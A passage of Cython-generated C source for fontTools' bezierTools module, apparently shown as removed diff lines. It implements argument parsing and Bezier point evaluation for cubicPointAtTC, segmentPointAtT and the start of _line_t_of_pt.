__Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - 
(void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 1); __PYX_ERR(0, 1087, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 2); __PYX_ERR(0, 1087, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 3); __PYX_ERR(0, 1087, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1087, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, 4); __PYX_ERR(0, 1087, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "cubicPointAtTC") < 0)) __PYX_ERR(0, 1087, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 
= __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - __pyx_v_t = __pyx_PyFloat_AsDouble(values[4]); if (unlikely((__pyx_v_t == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 1096, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("cubicPointAtTC", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 1087, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_64cubicPointAtTC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_64cubicPointAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t) { - double 
__pyx_v_t2; - double __pyx_v__1_t; - double __pyx_v__1_t_2; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - __pyx_t_double_complex __pyx_t_1; - PyObject *__pyx_t_2 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("cubicPointAtTC", 1); - - /* "fontTools/misc/bezierTools.py":1106 - * A complex number with the coordinates of the point. - * """ - * t2 = t * t # <<<<<<<<<<<<<< - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - */ - __pyx_v_t2 = (__pyx_v_t * __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":1107 - * """ - * t2 = t * t - * _1_t = 1 - t # <<<<<<<<<<<<<< - * _1_t_2 = _1_t * _1_t - * return _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - */ - __pyx_v__1_t = (1.0 - __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":1108 - * t2 = t * t - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t # <<<<<<<<<<<<<< - * return _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - * - */ - __pyx_v__1_t_2 = (__pyx_v__1_t * __pyx_v__1_t); - - /* "fontTools/misc/bezierTools.py":1109 - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - * return _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v__1_t), 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v_t), 0), __pyx_v_pt2), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t * __pyx_v_t2), 0), __pyx_v_pt3)))), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v_t2 * __pyx_v_t), 0), __pyx_v_pt4)); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1109, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = 
__pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_67segmentPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_66segmentPointAtT, "segmentPointAtT(seg, t)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_67segmentPointAtT = {"segmentPointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_67segmentPointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_66segmentPointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_67segmentPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_seg = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - 
__Pyx_RefNannySetupContext("segmentPointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_seg,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_seg)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1112, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1112, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("segmentPointAtT", 1, 2, 2, 1); __PYX_ERR(0, 1112, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "segmentPointAtT") < 0)) __PYX_ERR(0, 1112, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_seg = values[0]; - __pyx_v_t = values[1]; - } - goto __pyx_L6_skip; - 
__pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("segmentPointAtT", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1112, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_66segmentPointAtT(__pyx_self, __pyx_v_seg, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_66segmentPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg, PyObject *__pyx_v_t) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("segmentPointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1113 - * - * def segmentPointAtT(seg, t): - * if len(seg) == 2: # <<<<<<<<<<<<<< - * return linePointAtT(*seg, t) - * elif len(seg) == 3: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1113, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 2); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1114 - * def segmentPointAtT(seg, t): - * if len(seg) == 2: - * return linePointAtT(*seg, t) # <<<<<<<<<<<<<< - * elif 
len(seg) == 3: - * return quadraticPointAtT(*seg, t) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_linePointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_seg); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1114, __pyx_L1_error); - __pyx_t_6 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_6, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1114, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1113 - * - * def segmentPointAtT(seg, t): - * if len(seg) == 2: # <<<<<<<<<<<<<< - * return linePointAtT(*seg, t) - * elif len(seg) == 3: - */ - } - - /* "fontTools/misc/bezierTools.py":1115 - * if len(seg) == 2: - * return linePointAtT(*seg, t) - * elif len(seg) == 3: # <<<<<<<<<<<<<< - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1115, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1116 - * return linePointAtT(*seg, t) - * elif len(seg) == 3: - * return quadraticPointAtT(*seg, t) # <<<<<<<<<<<<<< - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) - */ - __Pyx_XDECREF(__pyx_r); - 
__Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_quadraticPointAtT); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_v_seg); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_t)) __PYX_ERR(0, 1116, __pyx_L1_error); - __pyx_t_4 = PyNumber_Add(__pyx_t_6, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1116, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1115 - * if len(seg) == 2: - * return linePointAtT(*seg, t) - * elif len(seg) == 3: # <<<<<<<<<<<<<< - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: - */ - } - - /* "fontTools/misc/bezierTools.py":1117 - * elif len(seg) == 3: - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: # <<<<<<<<<<<<<< - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") - */ - __pyx_t_1 = PyObject_Length(__pyx_v_seg); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1117, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1118 - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) # <<<<<<<<<<<<<< - * raise ValueError("Unknown curve degree") - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_cubicPointAtT); if 
(unlikely(!__pyx_t_3)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_seg); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1118, __pyx_L1_error); - __pyx_t_6 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_6, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1118, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1117 - * elif len(seg) == 3: - * return quadraticPointAtT(*seg, t) - * elif len(seg) == 4: # <<<<<<<<<<<<<< - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") - */ - } - - /* "fontTools/misc/bezierTools.py":1119 - * elif len(seg) == 4: - * return cubicPointAtT(*seg, t) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1119, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_Raise(__pyx_t_5, 0, 0, 0); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __PYX_ERR(0, 1119, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - 
__Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_69_line_t_of_pt(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_68_line_t_of_pt, "_line_t_of_pt(s, e, pt)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_69_line_t_of_pt = {"_line_t_of_pt", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_69_line_t_of_pt, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_68_line_t_of_pt}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_69_line_t_of_pt(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_s = 0; - PyObject *__pyx_v_e = 0; - PyObject *__pyx_v_pt = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_line_t_of_pt (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - 
#endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_s,&__pyx_n_s_e,&__pyx_n_s_pt,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_s)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1127, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_e)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1127, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_line_t_of_pt", 1, 3, 3, 1); __PYX_ERR(0, 1127, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1127, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_line_t_of_pt", 1, 3, 3, 2); __PYX_ERR(0, 1127, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_line_t_of_pt") < 0)) __PYX_ERR(0, 1127, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } 
else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_s = values[0]; - __pyx_v_e = values[1]; - __pyx_v_pt = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_line_t_of_pt", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 1127, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._line_t_of_pt", __pyx_clineno, __pyx_lineno, 